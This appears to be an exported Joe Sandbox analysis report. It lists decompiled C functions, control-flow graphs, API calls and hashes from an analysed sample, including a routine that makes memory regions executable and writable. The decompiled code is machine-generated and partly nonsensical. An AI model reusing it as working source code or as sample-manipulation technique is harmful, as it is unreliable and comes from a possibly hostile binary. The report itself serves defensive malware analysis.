                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                                                            • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                                                                            • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                                                            • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004AF91C Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 382 4af91c-4af942 GetSystemInfo VirtualQuery 383 4af948 382->383 384 4af9e7-4af9ee 382->384 385 4af9db-4af9e1 383->385 385->384 386 4af94d-4af954 385->386 387 4af956-4af95a 386->387 388 4af9c7-4af9d9 VirtualQuery 386->388 387->388 389 4af95c-4af967 387->389 388->384 388->385 390 4af978-4af98d VirtualProtect 389->390 391 4af969-4af96c 389->391 393 4af98f 390->393 394 4af994-4af996 390->394 391->390 392 4af96e-4af971 391->392 392->390 395 4af973-4af976 392->395 393->394 396 4af9a5-4af9a8 394->396 395->390 395->394 397 4af9aa-4af9af 396->397 398 4af998-4af9a1 call 4af914 396->398 397->388 400 4af9b1-4af9c2 VirtualProtect 397->400 398->396 400->388
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                                                                                            0x004af920
                                                                                                                            0x004af923
                                                                                                                            0x004af926
                                                                                                                            0x004af92f
                                                                                                                            0x004af93b
                                                                                                                            0x004af942
                                                                                                                            0x004af9ee
                                                                                                                            0x004af9ee
                                                                                                                            0x004af948
                                                                                                                            0x004af9db
                                                                                                                            0x004af9db
                                                                                                                            0x004af9e1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af954
                                                                                                                            0x004af9c7
                                                                                                                            0x004af9d2
                                                                                                                            0x004af9d9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004af95c
                                                                                                                            0x004af95c
                                                                                                                            0x004af961
                                                                                                                            0x004af967
                                                                                                                            0x004af986
                                                                                                                            0x004af98d
                                                                                                                            0x004af98f
                                                                                                                            0x004af98f
                                                                                                                            0x004af98d
                                                                                                                            0x004af994
                                                                                                                            0x004af9a5
                                                                                                                            0x004af99c
                                                                                                                            0x004af9a1
                                                                                                                            0x004af9a1
                                                                                                                            0x004af9af
                                                                                                                            0x004af9c2
                                                                                                                            0x004af9c2
                                                                                                                            0x00000000
                                                                                                                            0x004af9af
                                                                                                                            0x004af954
                                                                                                                            0x00000000
                                                                                                                            0x004af9db

                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2441996862-0
                                                                                                                            • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                                                            • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                                                                            • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                                                            • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407750 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 402 407750-407764 403 407766-407772 call 407630 call 4076b8 402->403 404 407777-40777e 402->404 403->404 406 407780-40778b GetCurrentThreadId 404->406 407 4077a1-4077a5 404->407 406->407 408 40778d-40779c call 407388 call 40768c 406->408 409 4077a7-4077ae 407->409 410 4077c9-4077cd 407->410 408->407 409->410 413 4077b0-4077c7 409->413 414 4077d9-4077dd 410->414 415 4077cf-4077d2 410->415 413->410 419 4077fc-407805 call 4073b0 414->419 420 4077df-4077e8 call 4054b4 414->420 415->414 418 4077d4-4077d6 415->418 418->414 429 407807-40780a 419->429 430 40780c-407811 419->430 420->419 428 4077ea-4077fa call 405ce8 call 4054b4 420->428 428->419 429->430 432 40782d-407838 call 407388 429->432 430->432 433 407813-407821 call 40b40c 430->433 440 40783a 432->440 441 40783d-407841 432->441 433->432 443 407823-407825 433->443 440->441 444 407843-407845 call 40768c 441->444 445 40784a-40784d 441->445 443->432 446 407827-407828 FreeLibrary 443->446 444->445 448 407866 445->448 449 40784f-407856 445->449 446->432 450 407858 449->450 451 40785e-407861 ExitProcess 449->451 450->451
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00407750() {
				void* _t20;
				void* _t23;
				intOrPtr _t31;
				intOrPtr* _t33;
				void* _t46;
				struct HINSTANCE__* _t49;
				void* _t56;

				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t46);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L8:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L14:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t15 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t15);
								_t31 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t31 + 0x10; // 0x400000
								_t49 =  *_t8;
								_t9 = _t31 + 4; // 0x400000
								if(_t49 !=  *_t9 && _t49 != 0) {
									FreeLibrary(_t49);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t56 = _t56 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L8;
					} else {
						_t20 = E004054B4();
						_t44 = _t20;
						if(_t20 == 0) {
							goto L14;
						} else {
							goto L13;
						}
						do {
							L13:
							E00405CE8(_t44);
							_t23 = E004054B4();
							_t44 = _t23;
						} while (_t23 != 0);
						goto L14;
					}
				} else {
					do {
						_t33 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t33();
					} while ( *0x4bb054 != 0);
					L8:
					while(1) {
					}
				}
			}










                                                                                                                            0x00407764
                                                                                                                            0x00407766
                                                                                                                            0x0040776b
                                                                                                                            0x00407772
                                                                                                                            0x00407772
                                                                                                                            0x0040777e
                                                                                                                            0x00407792
                                                                                                                            0x0040779c
                                                                                                                            0x0040779c
                                                                                                                            0x004077a5
                                                                                                                            0x004077c9
                                                                                                                            0x004077cd
                                                                                                                            0x004077d6
                                                                                                                            0x004077d6
                                                                                                                            0x004077dd
                                                                                                                            0x004077fc
                                                                                                                            0x004077fc
                                                                                                                            0x00407805
                                                                                                                            0x0040780c
                                                                                                                            0x00407811
                                                                                                                            0x00407813
                                                                                                                            0x00407818
                                                                                                                            0x0040781b
                                                                                                                            0x0040781b
                                                                                                                            0x0040781e
                                                                                                                            0x00407821
                                                                                                                            0x00407828
                                                                                                                            0x00407828
                                                                                                                            0x00407821
                                                                                                                            0x00407811
                                                                                                                            0x0040782f
                                                                                                                            0x00407838
                                                                                                                            0x0040783a
                                                                                                                            0x0040783a
                                                                                                                            0x00407841
                                                                                                                            0x00407845
                                                                                                                            0x00407845
                                                                                                                            0x0040784d
                                                                                                                            0x00407856
                                                                                                                            0x00407858
                                                                                                                            0x00407858
                                                                                                                            0x00407861
                                                                                                                            0x00407861
                                                                                                                            0x00407873
                                                                                                                            0x00407873
                                                                                                                            0x00407875
                                                                                                                            0x00407876
                                                                                                                            0x00000000
                                                                                                                            0x004077df
                                                                                                                            0x004077df
                                                                                                                            0x004077e4
                                                                                                                            0x004077e8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004077ea
                                                                                                                            0x004077ea
                                                                                                                            0x004077ec
                                                                                                                            0x004077f1
                                                                                                                            0x004077f6
                                                                                                                            0x004077f8
                                                                                                                            0x00000000
                                                                                                                            0x004077ea
                                                                                                                            0x004077b0
                                                                                                                            0x004077b0
                                                                                                                            0x004077b0
                                                                                                                            0x004077b9
                                                                                                                            0x004077be
                                                                                                                            0x004077c0
                                                                                                                            0x00000000
                                                                                                                            0x004077c9
                                                                                                                            0x00000000
                                                                                                                            0x004077c9

                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                            • String ID: MZP
                                                                                                                            • API String ID: 3490077880-2889622443
                                                                                                                            • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                                                            • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                                                                            • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                                                            • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407748 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 452 407748-407764 453 407766-407772 call 407630 call 4076b8 452->453 454 407777-40777e 452->454 453->454 456 407780-40778b GetCurrentThreadId 454->456 457 4077a1-4077a5 454->457 456->457 458 40778d-40779c call 407388 call 40768c 456->458 459 4077a7-4077ae 457->459 460 4077c9-4077cd 457->460 458->457 459->460 463 4077b0-4077c7 459->463 464 4077d9-4077dd 460->464 465 4077cf-4077d2 460->465 463->460 469 4077fc-407805 call 4073b0 464->469 470 4077df-4077e8 call 4054b4 464->470 465->464 468 4077d4-4077d6 465->468 468->464 479 407807-40780a 469->479 480 40780c-407811 469->480 470->469 478 4077ea-4077fa call 405ce8 call 4054b4 470->478 478->469 479->480 482 40782d-407838 call 407388 479->482 480->482 483 407813-407821 call 40b40c 480->483 490 40783a 482->490 491 40783d-407841 482->491 483->482 493 407823-407825 483->493 490->491 494 407843-407845 call 40768c 491->494 495 40784a-40784d 491->495 493->482 496 407827-407828 FreeLibrary 493->496 494->495 498 407866 495->498 499 40784f-407856 495->499 496->482 500 407858 499->500 501 40785e-407861 ExitProcess 499->501 500->501
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E00407748() {
				intOrPtr* _t14;
				void* _t23;
				void* _t26;
				intOrPtr _t34;
				intOrPtr* _t36;
				void* _t50;
				struct HINSTANCE__* _t53;
				void* _t62;

				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
				if( *0x4b7004 != 0) {
					E00407630();
					E004076B8(_t50);
					 *0x4b7004 = 0;
				}
				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
					E00407388(0x4bdbc8);
					E0040768C(0x4bdbc8);
				}
				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
					L9:
					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
						 *0x004BDBA4 = 0;
					}
					if( *((char*)(0x4bdbc0)) != 0) {
						L15:
						E004073B0();
						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
							_t18 =  *0x004BDBA8;
							if( *0x004BDBA8 != 0) {
								E0040B40C(_t18);
								_t34 =  *((intOrPtr*)(0x4bdba8));
								_t8 = _t34 + 0x10; // 0x400000
								_t53 =  *_t8;
								_t9 = _t34 + 4; // 0x400000
								if(_t53 !=  *_t9 && _t53 != 0) {
									FreeLibrary(_t53);
								}
							}
						}
						E00407388(0x4bdb98);
						if( *((char*)(0x4bdbc0)) == 1) {
							 *0x004BDBBC();
						}
						if( *((char*)(0x4bdbc0)) != 0) {
							E0040768C(0x4bdb98);
						}
						if( *0x4bdb98 == 0) {
							if( *0x4bb038 != 0) {
								 *0x4bb038();
							}
							ExitProcess( *0x4b7000); // executed
						}
						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
						_t62 = _t62 + 0xc;
						0x4b7000 = 0x4b7000;
						0x4bdb98 = 0x4bdb98;
						goto L9;
					} else {
						_t23 = E004054B4();
						_t48 = _t23;
						if(_t23 == 0) {
							goto L15;
						} else {
							goto L14;
						}
						do {
							L14:
							E00405CE8(_t48);
							_t26 = E004054B4();
							_t48 = _t26;
						} while (_t26 != 0);
						goto L15;
					}
				} else {
					do {
						_t36 =  *0x4bb054; // 0x0
						 *0x4bb054 = 0;
						 *_t36();
					} while ( *0x4bb054 != 0);
					L9:
					while(1) {
					}
				}
			}











                                                                                                                            0x0040774a
                                                                                                                            0x00407764
                                                                                                                            0x00407766
                                                                                                                            0x0040776b
                                                                                                                            0x00407772
                                                                                                                            0x00407772
                                                                                                                            0x0040777e
                                                                                                                            0x00407792
                                                                                                                            0x0040779c
                                                                                                                            0x0040779c
                                                                                                                            0x004077a5
                                                                                                                            0x004077c9
                                                                                                                            0x004077cd
                                                                                                                            0x004077d6
                                                                                                                            0x004077d6
                                                                                                                            0x004077dd
                                                                                                                            0x004077fc
                                                                                                                            0x004077fc
                                                                                                                            0x00407805
                                                                                                                            0x0040780c
                                                                                                                            0x00407811
                                                                                                                            0x00407813
                                                                                                                            0x00407818
                                                                                                                            0x0040781b
                                                                                                                            0x0040781b
                                                                                                                            0x0040781e
                                                                                                                            0x00407821
                                                                                                                            0x00407828
                                                                                                                            0x00407828
                                                                                                                            0x00407821
                                                                                                                            0x00407811
                                                                                                                            0x0040782f
                                                                                                                            0x00407838
                                                                                                                            0x0040783a
                                                                                                                            0x0040783a
                                                                                                                            0x00407841
                                                                                                                            0x00407845
                                                                                                                            0x00407845
                                                                                                                            0x0040784d
                                                                                                                            0x00407856
                                                                                                                            0x00407858
                                                                                                                            0x00407858
                                                                                                                            0x00407861
                                                                                                                            0x00407861
                                                                                                                            0x00407873
                                                                                                                            0x00407873
                                                                                                                            0x00407875
                                                                                                                            0x00407876
                                                                                                                            0x00000000
                                                                                                                            0x004077df
                                                                                                                            0x004077df
                                                                                                                            0x004077e4
                                                                                                                            0x004077e8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004077ea
                                                                                                                            0x004077ea
                                                                                                                            0x004077ec
                                                                                                                            0x004077f1
                                                                                                                            0x004077f6
                                                                                                                            0x004077f8
                                                                                                                            0x00000000
                                                                                                                            0x004077ea
                                                                                                                            0x004077b0
                                                                                                                            0x004077b0
                                                                                                                            0x004077b0
                                                                                                                            0x004077b9
                                                                                                                            0x004077be
                                                                                                                            0x004077c0
                                                                                                                            0x00000000
                                                                                                                            0x004077c9
                                                                                                                            0x00000000
                                                                                                                            0x004077c9

                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                                              • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                                              • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                                                            • String ID: MZP
                                                                                                                            • API String ID: 3490077880-2889622443
                                                                                                                            • Opcode ID: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                                                            • Instruction ID: bfc25cbdcfe625b544084418af651039c1e49876b6b13a82c314e6a817d38f33
                                                                                                                            • Opcode Fuzzy Hash: 1e4888025ee955e8cc7e0f2d2f1a13e961f3985afae2446d4f356ca194078bac
                                                                                                                            • Instruction Fuzzy Hash: E3314D20E087419BE721BB7A888935B7BA09B05315F14897FE541A73D2D77CB884CB6F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B5000 Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E004B5000(void* __ecx, void* __edx) {
				intOrPtr _t19;
				intOrPtr _t22;

				_push(_t22);
				_push(0x4b50d7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t22;
				 *0x4bb98c =  *0x4bb98c - 1;
				if( *0x4bb98c < 0) {
					E00405B74();
					E004051A8();
					SetThreadLocale(0x400); // executed
					E0040A250();
					 *0x4b700c = 2;
					 *0x4bb01c = 0x4036b0;
					 *0x4bb020 = 0x4036b8;
					 *0x4bb05a = 2;
					 *0x4bb060 = E0040CAA4();
					 *0x4bb008 = 0x4095a0;
					E00405BCC(E00405BB0());
					 *0x4bb068 = 0xd7b0;
					 *0x4bb344 = 0xd7b0;
					 *0x4bb620 = 0xd7b0;
					 *0x4bb050 = GetCommandLineW();
					 *0x4bb04c = E00403810();
					 *0x4bb97c = GetACP();
					 *0x4bb980 = 0x4b0;
					 *0x4bb044 = GetCurrentThreadId();
					E0040CAB8();
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x4b50de);
				return 0;
			}





                                                                                                                            0x004b5005
                                                                                                                            0x004b5006
                                                                                                                            0x004b500b
                                                                                                                            0x004b500e
                                                                                                                            0x004b5011
                                                                                                                            0x004b5018
                                                                                                                            0x004b501e
                                                                                                                            0x004b5023
                                                                                                                            0x004b502d
                                                                                                                            0x004b5032
                                                                                                                            0x004b5037
                                                                                                                            0x004b503e
                                                                                                                            0x004b5048
                                                                                                                            0x004b5052
                                                                                                                            0x004b505e
                                                                                                                            0x004b5063
                                                                                                                            0x004b5072
                                                                                                                            0x004b5077
                                                                                                                            0x004b5080
                                                                                                                            0x004b5089
                                                                                                                            0x004b5097
                                                                                                                            0x004b50a1
                                                                                                                            0x004b50ab
                                                                                                                            0x004b50b0
                                                                                                                            0x004b50bf
                                                                                                                            0x004b50c4
                                                                                                                            0x004b50c4
                                                                                                                            0x004b50cb
                                                                                                                            0x004b50ce
                                                                                                                            0x004b50d1
                                                                                                                            0x004b50d6

                                                                                                                            APIs
                                                                                                                            • SetThreadLocale.KERNEL32(00000400,00000000,004B50D7), ref: 004B502D
                                                                                                                              • Part of subcall function 0040A250: InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                                                              • Part of subcall function 0040A250: GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                                                              • Part of subcall function 0040A250: GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                                                              • Part of subcall function 0040A250: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                                                              • Part of subcall function 0040CAA4: GetSystemInfo.KERNEL32 ref: 0040CAA8
                                                                                                                            • GetCommandLineW.KERNEL32(00000400,00000000,004B50D7), ref: 004B5092
                                                                                                                              • Part of subcall function 00403810: GetStartupInfoW.KERNEL32 ref: 00403821
                                                                                                                            • GetACP.KERNEL32(00000400,00000000,004B50D7), ref: 004B50A6
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004B50BA
                                                                                                                              • Part of subcall function 0040CAB8: GetVersion.KERNEL32(004B50C9,00000400,00000000,004B50D7), ref: 0040CAB8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000010.00000002.401849374.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000010.00000002.401832965.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403182335.00000000004B7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403259407.00000000004C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403359279.00000000004C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 00000010.00000002.403383029.00000000004C6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_16_2_400000_62829252dc457_91e450cbce.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc$InfoThreadVersion$CommandCriticalCurrentInitializeLineLocaleSectionStartupSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2740004594-0
                                                                                                                            • Opcode ID: aeeb1ef19c021384e5e919f33d2f1f63d534ea4b25bb20b8f726cabb6b9d9f22
